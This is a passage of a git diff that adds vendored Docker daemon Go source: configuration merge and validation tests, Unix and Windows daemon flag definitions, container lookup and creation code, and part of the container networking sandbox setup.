+ f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.Bool("debug", false, "") + flags.Set("debug", "false") + + _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "debug") { + t.Fatalf("expected debug conflict, got %v", err) + } +} + +func TestDaemonConfigurationMergeConflictsWithInnerStructs(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"tlscacert": "/etc/certificates/ca.pem"}`)) + f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("tlscacert", "", "") + flags.Set("tlscacert", "~/.docker/ca.pem") + + _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "tlscacert") { + t.Fatalf("expected tlscacert conflict, got %v", err) + } +} + +func TestFindConfigurationConflictsWithUnknownKeys(t *testing.T) { + config := map[string]interface{}{"tls-verify": "true"} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + flags.Bool("tlsverify", false, "") + err := findConfigurationConflicts(config, flags) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "the following directives don't match any configuration option: tls-verify") { + t.Fatalf("expected tls-verify conflict, got %v", err) + } +} + +func TestFindConfigurationConflictsWithMergedValues(t *testing.T) { + var hosts []string + config := map[string]interface{}{"hosts": "tcp://127.0.0.1:2345"} + flags := pflag.NewFlagSet("base", pflag.ContinueOnError) + flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, nil), "host", "H", "") + + err := findConfigurationConflicts(config, flags) + if err != nil { + t.Fatal(err) + } + + flags.Set("host", "unix:///var/run/docker.sock") + err = 
findConfigurationConflicts(config, flags) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "hosts: (from flag: [unix:///var/run/docker.sock], from file: tcp://127.0.0.1:2345)") { + t.Fatalf("expected hosts conflict, got %v", err) + } +} + +func TestValidateConfiguration(t *testing.T) { + c1 := &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"one"}, + }, + } + + err := ValidateConfiguration(c1) + if err == nil { + t.Fatal("expected error, got nil") + } + + c2 := &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"one=two"}, + }, + } + + err = ValidateConfiguration(c2) + if err != nil { + t.Fatalf("expected no error, got error %v", err) + } + + c3 := &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"1.1.1.1"}, + }, + } + + err = ValidateConfiguration(c3) + if err != nil { + t.Fatalf("expected no error, got error %v", err) + } + + c4 := &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"1.1.1.1o"}, + }, + } + + err = ValidateConfiguration(c4) + if err == nil { + t.Fatal("expected error, got nil") + } + + c5 := &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"a.b.c"}, + }, + } + + err = ValidateConfiguration(c5) + if err != nil { + t.Fatalf("expected no error, got error %v", err) + } + + c6 := &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"123456"}, + }, + } + + err = ValidateConfiguration(c6) + if err == nil { + t.Fatal("expected error, got nil") + } +} diff --git a/vendor/github.com/docker/docker/daemon/config_unix.go b/vendor/github.com/docker/docker/daemon/config_unix.go new file mode 100644 index 0000000000..d0957884b3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_unix.go @@ -0,0 +1,104 @@ +// +build linux freebsd + +package daemon + +import ( + "fmt" + + runconfigopts "github.com/docker/docker/runconfig/opts" + units "github.com/docker/go-units" + "github.com/spf13/pflag" +) + +var ( + defaultPidFile = "/var/run/docker.pid" + defaultGraph = 
"/var/lib/docker" + defaultExecRoot = "/var/run/docker" +) + +// Config defines the configuration of a docker daemon. +// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line uses. +type Config struct { + CommonConfig + + // These fields are common to all unix platforms. + CommonUnixConfig + + // Fields below here are platform specific. + CgroupParent string `json:"cgroup-parent,omitempty"` + EnableSelinuxSupport bool `json:"selinux-enabled,omitempty"` + RemappedRoot string `json:"userns-remap,omitempty"` + Ulimits map[string]*units.Ulimit `json:"default-ulimits,omitempty"` + CPURealtimePeriod int64 `json:"cpu-rt-period,omitempty"` + CPURealtimeRuntime int64 `json:"cpu-rt-runtime,omitempty"` + OOMScoreAdjust int `json:"oom-score-adjust,omitempty"` + Init bool `json:"init,omitempty"` + InitPath string `json:"init-path,omitempty"` + SeccompProfile string `json:"seccomp-profile,omitempty"` +} + +// bridgeConfig stores all the bridge driver specific +// configuration. +type bridgeConfig struct { + commonBridgeConfig + + // These fields are common to all unix platforms. + commonUnixBridgeConfig + + // Fields below here are platform specific. 
+ EnableIPv6 bool `json:"ipv6,omitempty"` + EnableIPTables bool `json:"iptables,omitempty"` + EnableIPForward bool `json:"ip-forward,omitempty"` + EnableIPMasq bool `json:"ip-masq,omitempty"` + EnableUserlandProxy bool `json:"userland-proxy,omitempty"` + UserlandProxyPath string `json:"userland-proxy-path,omitempty"` + FixedCIDRv6 string `json:"fixed-cidr-v6,omitempty"` +} + +// InstallFlags adds flags to the pflag.FlagSet to configure the daemon +func (config *Config) InstallFlags(flags *pflag.FlagSet) { + // First handle install flags which are consistent cross-platform + config.InstallCommonFlags(flags) + + // Then install flags common to unix platforms + config.InstallCommonUnixFlags(flags) + + config.Ulimits = make(map[string]*units.Ulimit) + + // Then platform-specific install flags + flags.BoolVar(&config.EnableSelinuxSupport, "selinux-enabled", false, "Enable selinux support") + flags.Var(runconfigopts.NewUlimitOpt(&config.Ulimits), "default-ulimit", "Default ulimits for containers") + flags.BoolVar(&config.bridgeConfig.EnableIPTables, "iptables", true, "Enable addition of iptables rules") + flags.BoolVar(&config.bridgeConfig.EnableIPForward, "ip-forward", true, "Enable net.ipv4.ip_forward") + flags.BoolVar(&config.bridgeConfig.EnableIPMasq, "ip-masq", true, "Enable IP masquerading") + flags.BoolVar(&config.bridgeConfig.EnableIPv6, "ipv6", false, "Enable IPv6 networking") + flags.StringVar(&config.ExecRoot, "exec-root", defaultExecRoot, "Root directory for execution state files") + flags.StringVar(&config.bridgeConfig.FixedCIDRv6, "fixed-cidr-v6", "", "IPv6 subnet for fixed IPs") + flags.BoolVar(&config.bridgeConfig.EnableUserlandProxy, "userland-proxy", true, "Use userland proxy for loopback traffic") + flags.StringVar(&config.bridgeConfig.UserlandProxyPath, "userland-proxy-path", "", "Path to the userland proxy binary") + flags.BoolVar(&config.EnableCors, "api-enable-cors", false, "Enable CORS headers in the Engine API, this is deprecated by 
--api-cors-header") + flags.MarkDeprecated("api-enable-cors", "Please use --api-cors-header") + flags.StringVar(&config.CgroupParent, "cgroup-parent", "", "Set parent cgroup for all containers") + flags.StringVar(&config.RemappedRoot, "userns-remap", "", "User/Group setting for user namespaces") + flags.StringVar(&config.ContainerdAddr, "containerd", "", "Path to containerd socket") + flags.BoolVar(&config.LiveRestoreEnabled, "live-restore", false, "Enable live restore of docker when containers are still running") + flags.IntVar(&config.OOMScoreAdjust, "oom-score-adjust", -500, "Set the oom_score_adj for the daemon") + flags.BoolVar(&config.Init, "init", false, "Run an init in the container to forward signals and reap processes") + flags.StringVar(&config.InitPath, "init-path", "", "Path to the docker-init binary") + flags.Int64Var(&config.CPURealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") + flags.Int64Var(&config.CPURealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") + flags.StringVar(&config.SeccompProfile, "seccomp-profile", "", "Path to seccomp profile") + + config.attachExperimentalFlags(flags) +} + +func (config *Config) isSwarmCompatible() error { + if config.ClusterStore != "" || config.ClusterAdvertise != "" { + return fmt.Errorf("--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") + } + if config.LiveRestoreEnabled { + return fmt.Errorf("--live-restore daemon configuration is incompatible with swarm mode") + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/config_unix_test.go b/vendor/github.com/docker/docker/daemon/config_unix_test.go new file mode 100644 index 0000000000..86c16f57ba --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_unix_test.go @@ -0,0 +1,80 @@ +// +build !windows + +package daemon + +import ( + "io/ioutil" + "testing" +) + +func TestDaemonConfigurationMerge(t *testing.T) { + f, err 
:= ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + + f.Write([]byte(` + { + "debug": true, + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 2048, + "Soft": 1024 + } + }, + "log-opts": { + "tag": "test_tag" + } + }`)) + + f.Close() + + c := &Config{ + CommonConfig: CommonConfig{ + AutoRestart: true, + LogConfig: LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test"}, + }, + }, + } + + cc, err := MergeDaemonConfigurations(c, nil, configFile) + if err != nil { + t.Fatal(err) + } + if !cc.Debug { + t.Fatalf("expected %v, got %v\n", true, cc.Debug) + } + if !cc.AutoRestart { + t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart) + } + if cc.LogConfig.Type != "syslog" { + t.Fatalf("expected syslog config, got %q\n", cc.LogConfig) + } + + if configValue, OK := cc.LogConfig.Config["tag"]; !OK { + t.Fatal("expected syslog config attributes, got nil\n") + } else { + if configValue != "test_tag" { + t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue) + } + } + + if cc.Ulimits == nil { + t.Fatal("expected default ulimit config, got nil\n") + } else { + if _, OK := cc.Ulimits["nofile"]; OK { + if cc.Ulimits["nofile"].Name != "nofile" || + cc.Ulimits["nofile"].Hard != 2048 || + cc.Ulimits["nofile"].Soft != 1024 { + t.Fatalf("expected default ulimit name, hard and soft are nofile, 2048, 1024, got %s, %d, %d\n", cc.Ulimits["nofile"].Name, cc.Ulimits["nofile"].Hard, cc.Ulimits["nofile"].Soft) + } + } else { + t.Fatal("expected default ulimit name nofile, got nil\n") + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/config_windows.go b/vendor/github.com/docker/docker/daemon/config_windows.go new file mode 100644 index 0000000000..df59dcf302 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_windows.go @@ -0,0 +1,71 @@ +package daemon + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/api/types" + 
"github.com/spf13/pflag" +) + +var ( + defaultPidFile string + defaultGraph = filepath.Join(os.Getenv("programdata"), "docker") +) + +// bridgeConfig stores all the bridge driver specific +// configuration. +type bridgeConfig struct { + commonBridgeConfig +} + +// Config defines the configuration of a docker daemon. +// These are the configuration settings that you pass +// to the docker daemon when you launch it with say: `docker daemon -e windows` +type Config struct { + CommonConfig + + // Fields below here are platform specific. (There are none presently + // for the Windows daemon.) +} + +// InstallFlags adds flags to the pflag.FlagSet to configure the daemon +func (config *Config) InstallFlags(flags *pflag.FlagSet) { + // First handle install flags which are consistent cross-platform + config.InstallCommonFlags(flags) + + // Then platform-specific install flags. + flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") + flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a virtual switch") + flags.StringVarP(&config.SocketGroup, "group", "G", "", "Users or groups that can access the named pipe") +} + +// GetRuntime returns the runtime path and arguments for a given +// runtime name +func (config *Config) GetRuntime(name string) *types.Runtime { + return nil +} + +// GetInitPath returns the configure docker-init path +func (config *Config) GetInitPath() string { + return "" +} + +// GetDefaultRuntimeName returns the current default runtime +func (config *Config) GetDefaultRuntimeName() string { + return stockRuntimeName +} + +// GetAllRuntimes returns a copy of the runtimes map +func (config *Config) GetAllRuntimes() map[string]types.Runtime { + return map[string]types.Runtime{} +} + +// GetExecRoot returns the user configured Exec-root +func (config *Config) GetExecRoot() string { + return "" +} + +func (config *Config) isSwarmCompatible() error { + return nil +} diff --git 
a/vendor/github.com/docker/docker/daemon/config_windows_test.go b/vendor/github.com/docker/docker/daemon/config_windows_test.go new file mode 100644 index 0000000000..4a7b95c17d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_windows_test.go @@ -0,0 +1,59 @@ +// +build windows + +package daemon + +import ( + "io/ioutil" + "testing" +) + +func TestDaemonConfigurationMerge(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + + f.Write([]byte(` + { + "debug": true, + "log-opts": { + "tag": "test_tag" + } + }`)) + + f.Close() + + c := &Config{ + CommonConfig: CommonConfig{ + AutoRestart: true, + LogConfig: LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test"}, + }, + }, + } + + cc, err := MergeDaemonConfigurations(c, nil, configFile) + if err != nil { + t.Fatal(err) + } + if !cc.Debug { + t.Fatalf("expected %v, got %v\n", true, cc.Debug) + } + if !cc.AutoRestart { + t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart) + } + if cc.LogConfig.Type != "syslog" { + t.Fatalf("expected syslog config, got %q\n", cc.LogConfig) + } + + if configValue, OK := cc.LogConfig.Config["tag"]; !OK { + t.Fatal("expected syslog config attributes, got nil\n") + } else { + if configValue != "test_tag" { + t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/container.go b/vendor/github.com/docker/docker/daemon/container.go new file mode 100644 index 0000000000..2a44800098 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container.go @@ -0,0 +1,282 @@ +package daemon + +import ( + "fmt" + "os" + "path/filepath" + "time" + + "github.com/docker/docker/api/errors" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/network" + 
"github.com/docker/docker/image" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/pkg/truncindex" + "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" +) + +// GetContainer looks for a container using the provided information, which could be +// one of the following inputs from the caller: +// - A full container ID, which will exact match a container in daemon's list +// - A container name, which will only exact match via the GetByName() function +// - A partial container ID prefix (e.g. short ID) of any length that is +// unique enough to only return a single container object +// If none of these searches succeed, an error is returned +func (daemon *Daemon) GetContainer(prefixOrName string) (*container.Container, error) { + if len(prefixOrName) == 0 { + return nil, errors.NewBadRequestError(fmt.Errorf("No container name or ID supplied")) + } + + if containerByID := daemon.containers.Get(prefixOrName); containerByID != nil { + // prefix is an exact match to a full container ID + return containerByID, nil + } + + // GetByName will match only an exact name provided; we ignore errors + if containerByName, _ := daemon.GetByName(prefixOrName); containerByName != nil { + // prefix is an exact match to a full container Name + return containerByName, nil + } + + containerID, indexError := daemon.idIndex.Get(prefixOrName) + if indexError != nil { + // When truncindex defines an error type, use that instead + if indexError == truncindex.ErrNotExist { + err := fmt.Errorf("No such container: %s", prefixOrName) + return nil, errors.NewRequestNotFoundError(err) + } + return nil, indexError + } + return daemon.containers.Get(containerID), nil +} + +// Exists returns a true if a container of the specified ID or name exists, +// false otherwise. 
+func (daemon *Daemon) Exists(id string) bool { + c, _ := daemon.GetContainer(id) + return c != nil +} + +// IsPaused returns a bool indicating if the specified container is paused. +func (daemon *Daemon) IsPaused(id string) bool { + c, _ := daemon.GetContainer(id) + return c.State.IsPaused() +} + +func (daemon *Daemon) containerRoot(id string) string { + return filepath.Join(daemon.repository, id) +} + +// Load reads the contents of a container from disk +// This is typically done at startup. +func (daemon *Daemon) load(id string) (*container.Container, error) { + container := daemon.newBaseContainer(id) + + if err := container.FromDisk(); err != nil { + return nil, err + } + + if container.ID != id { + return container, fmt.Errorf("Container %s is stored at %s", container.ID, id) + } + + return container, nil +} + +// Register makes a container object usable by the daemon as +func (daemon *Daemon) Register(c *container.Container) error { + // Attach to stdout and stderr + if c.Config.OpenStdin { + c.StreamConfig.NewInputPipes() + } else { + c.StreamConfig.NewNopInputPipe() + } + + daemon.containers.Add(c.ID, c) + daemon.idIndex.Add(c.ID) + + return nil +} + +func (daemon *Daemon) newContainer(name string, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) { + var ( + id string + err error + noExplicitName = name == "" + ) + id, name, err = daemon.generateIDAndName(name) + if err != nil { + return nil, err + } + + if hostConfig.NetworkMode.IsHost() { + if config.Hostname == "" { + config.Hostname, err = os.Hostname() + if err != nil { + return nil, err + } + } + } else { + daemon.generateHostname(id, config) + } + entrypoint, args := daemon.getEntrypointAndArgs(config.Entrypoint, config.Cmd) + + base := daemon.newBaseContainer(id) + base.Created = time.Now().UTC() + base.Managed = managed + base.Path = entrypoint + base.Args = args //FIXME: de-duplicate from config + base.Config = 
config + base.HostConfig = &containertypes.HostConfig{} + base.ImageID = imgID + base.NetworkSettings = &network.Settings{IsAnonymousEndpoint: noExplicitName} + base.Name = name + base.Driver = daemon.GraphDriverName() + + return base, err +} + +// GetByName returns a container given a name. +func (daemon *Daemon) GetByName(name string) (*container.Container, error) { + if len(name) == 0 { + return nil, fmt.Errorf("No container name supplied") + } + fullName := name + if name[0] != '/' { + fullName = "/" + name + } + id, err := daemon.nameIndex.Get(fullName) + if err != nil { + return nil, fmt.Errorf("Could not find entity for %s", name) + } + e := daemon.containers.Get(id) + if e == nil { + return nil, fmt.Errorf("Could not find container for entity id %s", id) + } + return e, nil +} + +// newBaseContainer creates a new container with its initial +// configuration based on the root storage from the daemon. +func (daemon *Daemon) newBaseContainer(id string) *container.Container { + return container.NewBaseContainer(id, daemon.containerRoot(id)) +} + +func (daemon *Daemon) getEntrypointAndArgs(configEntrypoint strslice.StrSlice, configCmd strslice.StrSlice) (string, []string) { + if len(configEntrypoint) != 0 { + return configEntrypoint[0], append(configEntrypoint[1:], configCmd...) 
+ } + return configCmd[0], configCmd[1:] +} + +func (daemon *Daemon) generateHostname(id string, config *containertypes.Config) { + // Generate default hostname + if config.Hostname == "" { + config.Hostname = id[:12] + } +} + +func (daemon *Daemon) setSecurityOptions(container *container.Container, hostConfig *containertypes.HostConfig) error { + container.Lock() + defer container.Unlock() + return parseSecurityOpt(container, hostConfig) +} + +func (daemon *Daemon) setHostConfig(container *container.Container, hostConfig *containertypes.HostConfig) error { + // Do not lock while creating volumes since this could be calling out to external plugins + // Don't want to block other actions, like `docker ps` because we're waiting on an external plugin + if err := daemon.registerMountPoints(container, hostConfig); err != nil { + return err + } + + container.Lock() + defer container.Unlock() + + // Register any links from the host config before starting the container + if err := daemon.registerLinks(container, hostConfig); err != nil { + return err + } + + // make sure links is not nil + // this ensures that on the next daemon restart we don't try to migrate from legacy sqlite links + if hostConfig.Links == nil { + hostConfig.Links = []string{} + } + + container.HostConfig = hostConfig + return container.ToDisk() +} + +// verifyContainerSettings performs validation of the hostconfig and config +// structures. +func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { + + // First perform verification of settings common across all platforms. 
+ if config != nil { + if config.WorkingDir != "" { + config.WorkingDir = filepath.FromSlash(config.WorkingDir) // Ensure in platform semantics + if !system.IsAbs(config.WorkingDir) { + return nil, fmt.Errorf("the working directory '%s' is invalid, it needs to be an absolute path", config.WorkingDir) + } + } + + if len(config.StopSignal) > 0 { + _, err := signal.ParseSignal(config.StopSignal) + if err != nil { + return nil, err + } + } + + // Validate if Env contains empty variable or not (e.g., ``, `=foo`) + for _, env := range config.Env { + if _, err := opts.ValidateEnv(env); err != nil { + return nil, err + } + } + } + + if hostConfig == nil { + return nil, nil + } + + if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { + return nil, fmt.Errorf("can't create 'AutoRemove' container with restart policy") + } + + for port := range hostConfig.PortBindings { + _, portStr := nat.SplitProtoPort(string(port)) + if _, err := nat.ParsePort(portStr); err != nil { + return nil, fmt.Errorf("invalid port specification: %q", portStr) + } + for _, pb := range hostConfig.PortBindings[port] { + _, err := nat.NewPort(nat.SplitProtoPort(pb.HostPort)) + if err != nil { + return nil, fmt.Errorf("invalid port specification: %q", pb.HostPort) + } + } + } + + p := hostConfig.RestartPolicy + + switch p.Name { + case "always", "unless-stopped", "no": + if p.MaximumRetryCount != 0 { + return nil, fmt.Errorf("maximum retry count cannot be used with restart policy '%s'", p.Name) + } + case "on-failure": + if p.MaximumRetryCount < 0 { + return nil, fmt.Errorf("maximum retry count cannot be negative") + } + case "": + // do nothing + default: + return nil, fmt.Errorf("invalid restart policy '%s'", p.Name) + } + + // Now do platform-specific verification + return verifyPlatformContainerSettings(daemon, hostConfig, config, update) +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations.go b/vendor/github.com/docker/docker/daemon/container_operations.go new file 
mode 100644 index 0000000000..c30250622d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_operations.go @@ -0,0 +1,1049 @@ +package daemon + +import ( + "errors" + "fmt" + "net" + "os" + "path" + "runtime" + "strings" + "time" + + "github.com/Sirupsen/logrus" + derr "github.com/docker/docker/api/errors" + containertypes "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/network" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/runconfig" + "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/options" + "github.com/docker/libnetwork/types" +) + +var ( + // ErrRootFSReadOnly is returned when a container + // rootfs is marked readonly. + ErrRootFSReadOnly = errors.New("container rootfs is marked read-only") + getPortMapInfo = container.GetSandboxPortMapInfo +) + +func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]libnetwork.SandboxOption, error) { + var ( + sboxOptions []libnetwork.SandboxOption + err error + dns []string + dnsSearch []string + dnsOptions []string + bindings = make(nat.PortMap) + pbList []types.PortBinding + exposeList []types.TransportPort + ) + + defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() + sboxOptions = append(sboxOptions, libnetwork.OptionHostname(container.Config.Hostname), + libnetwork.OptionDomainname(container.Config.Domainname)) + + if container.HostConfig.NetworkMode.IsHost() { + sboxOptions = append(sboxOptions, libnetwork.OptionUseDefaultSandbox()) + if len(container.HostConfig.ExtraHosts) == 0 { + sboxOptions = append(sboxOptions, libnetwork.OptionOriginHostsPath("/etc/hosts")) + } + if len(container.HostConfig.DNS) == 0 && len(daemon.configStore.DNS) == 0 && + len(container.HostConfig.DNSSearch) == 0 && 
len(daemon.configStore.DNSSearch) == 0 && + len(container.HostConfig.DNSOptions) == 0 && len(daemon.configStore.DNSOptions) == 0 { + sboxOptions = append(sboxOptions, libnetwork.OptionOriginResolvConfPath("/etc/resolv.conf")) + } + } else { + // OptionUseExternalKey is mandatory for userns support. + // But optional for non-userns support + sboxOptions = append(sboxOptions, libnetwork.OptionUseExternalKey()) + } + + if err = setupPathsAndSandboxOptions(container, &sboxOptions); err != nil { + return nil, err + } + + if len(container.HostConfig.DNS) > 0 { + dns = container.HostConfig.DNS + } else if len(daemon.configStore.DNS) > 0 { + dns = daemon.configStore.DNS + } + + for _, d := range dns { + sboxOptions = append(sboxOptions, libnetwork.OptionDNS(d)) + } + + if len(container.HostConfig.DNSSearch) > 0 { + dnsSearch = container.HostConfig.DNSSearch + } else if len(daemon.configStore.DNSSearch) > 0 { + dnsSearch = daemon.configStore.DNSSearch + } + + for _, ds := range dnsSearch { + sboxOptions = append(sboxOptions, libnetwork.OptionDNSSearch(ds)) + } + + if len(container.HostConfig.DNSOptions) > 0 { + dnsOptions = container.HostConfig.DNSOptions + } else if len(daemon.configStore.DNSOptions) > 0 { + dnsOptions = daemon.configStore.DNSOptions + } + + for _, ds := range dnsOptions { + sboxOptions = append(sboxOptions, libnetwork.OptionDNSOptions(ds)) + } + + if container.NetworkSettings.SecondaryIPAddresses != nil { + name := container.Config.Hostname + if container.Config.Domainname != "" { + name = name + "." 
+ container.Config.Domainname + } + + for _, a := range container.NetworkSettings.SecondaryIPAddresses { + sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(name, a.Addr)) + } + } + + for _, extraHost := range container.HostConfig.ExtraHosts { + // allow IPv6 addresses in extra hosts; only split on first ":" + parts := strings.SplitN(extraHost, ":", 2) + sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(parts[0], parts[1])) + } + + if container.HostConfig.PortBindings != nil { + for p, b := range container.HostConfig.PortBindings { + bindings[p] = []nat.PortBinding{} + for _, bb := range b { + bindings[p] = append(bindings[p], nat.PortBinding{ + HostIP: bb.HostIP, + HostPort: bb.HostPort, + }) + } + } + } + + portSpecs := container.Config.ExposedPorts + ports := make([]nat.Port, len(portSpecs)) + var i int + for p := range portSpecs { + ports[i] = p + i++ + } + nat.SortPortMap(ports, bindings) + for _, port := range ports { + expose := types.TransportPort{} + expose.Proto = types.ParseProtocol(port.Proto()) + expose.Port = uint16(port.Int()) + exposeList = append(exposeList, expose) + + pb := types.PortBinding{Port: expose.Port, Proto: expose.Proto} + binding := bindings[port] + for i := 0; i < len(binding); i++ { + pbCopy := pb.GetCopy() + newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort)) + var portStart, portEnd int + if err == nil { + portStart, portEnd, err = newP.Range() + } + if err != nil { + return nil, fmt.Errorf("Error parsing HostPort value(%s):%v", binding[i].HostPort, err) + } + pbCopy.HostPort = uint16(portStart) + pbCopy.HostPortEnd = uint16(portEnd) + pbCopy.HostIP = net.ParseIP(binding[i].HostIP) + pbList = append(pbList, pbCopy) + } + + if container.HostConfig.PublishAllPorts && len(binding) == 0 { + pbList = append(pbList, pb) + } + } + + sboxOptions = append(sboxOptions, + libnetwork.OptionPortMapping(pbList), + libnetwork.OptionExposedPorts(exposeList)) + + // Legacy Link feature is supported only for the 
default bridge network. + // return if this call to build join options is not for default bridge network + // Legacy Link is only supported by docker run --link + bridgeSettings, ok := container.NetworkSettings.Networks[defaultNetName] + if !ok || bridgeSettings.EndpointSettings == nil { + return sboxOptions, nil + } + + if bridgeSettings.EndpointID == "" { + return sboxOptions, nil + } + + var ( + childEndpoints, parentEndpoints []string + cEndpointID string + ) + + children := daemon.children(container) + for linkAlias, child := range children { + if !isLinkable(child) { + return nil, fmt.Errorf("Cannot link to %s, as it does not belong to the default network", child.Name) + } + _, alias := path.Split(linkAlias) + // allow access to the linked container via the alias, real name, and container hostname + aliasList := alias + " " + child.Config.Hostname + // only add the name if alias isn't equal to the name + if alias != child.Name[1:] { + aliasList = aliasList + " " + child.Name[1:] + } + sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(aliasList, child.NetworkSettings.Networks[defaultNetName].IPAddress)) + cEndpointID = child.NetworkSettings.Networks[defaultNetName].EndpointID + if cEndpointID != "" { + childEndpoints = append(childEndpoints, cEndpointID) + } + } + + for alias, parent := range daemon.parents(container) { + if daemon.configStore.DisableBridge || !container.HostConfig.NetworkMode.IsPrivate() { + continue + } + + _, alias = path.Split(alias) + logrus.Debugf("Update /etc/hosts of %s for alias %s with ip %s", parent.ID, alias, bridgeSettings.IPAddress) + sboxOptions = append(sboxOptions, libnetwork.OptionParentUpdate( + parent.ID, + alias, + bridgeSettings.IPAddress, + )) + if cEndpointID != "" { + parentEndpoints = append(parentEndpoints, cEndpointID) + } + } + + linkOptions := options.Generic{ + netlabel.GenericData: options.Generic{ + "ParentEndpoints": parentEndpoints, + "ChildEndpoints": childEndpoints, + }, + } + + sboxOptions = 
append(sboxOptions, libnetwork.OptionGeneric(linkOptions)) + return sboxOptions, nil +} + +func (daemon *Daemon) updateNetworkSettings(container *container.Container, n libnetwork.Network, endpointConfig *networktypes.EndpointSettings) error { + if container.NetworkSettings == nil { + container.NetworkSettings = &network.Settings{Networks: make(map[string]*network.EndpointSettings)} + } + + if !container.HostConfig.NetworkMode.IsHost() && containertypes.NetworkMode(n.Type()).IsHost() { + return runconfig.ErrConflictHostNetwork + } + + for s := range container.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(s) + if err != nil { + continue + } + + if sn.Name() == n.Name() { + // Avoid duplicate config + return nil + } + if !containertypes.NetworkMode(sn.Type()).IsPrivate() || + !containertypes.NetworkMode(n.Type()).IsPrivate() { + return runconfig.ErrConflictSharedNetwork + } + if containertypes.NetworkMode(sn.Name()).IsNone() || + containertypes.NetworkMode(n.Name()).IsNone() { + return runconfig.ErrConflictNoNetwork + } + } + + if _, ok := container.NetworkSettings.Networks[n.Name()]; !ok { + container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{ + EndpointSettings: endpointConfig, + } + } + + return nil +} + +func (daemon *Daemon) updateEndpointNetworkSettings(container *container.Container, n libnetwork.Network, ep libnetwork.Endpoint) error { + if err := container.BuildEndpointInfo(n, ep); err != nil { + return err + } + + if container.HostConfig.NetworkMode == runconfig.DefaultDaemonNetworkMode() { + container.NetworkSettings.Bridge = daemon.configStore.bridgeConfig.Iface + } + + return nil +} + +// UpdateNetwork is used to update the container's network (e.g. when linked containers +// get removed/unlinked). 
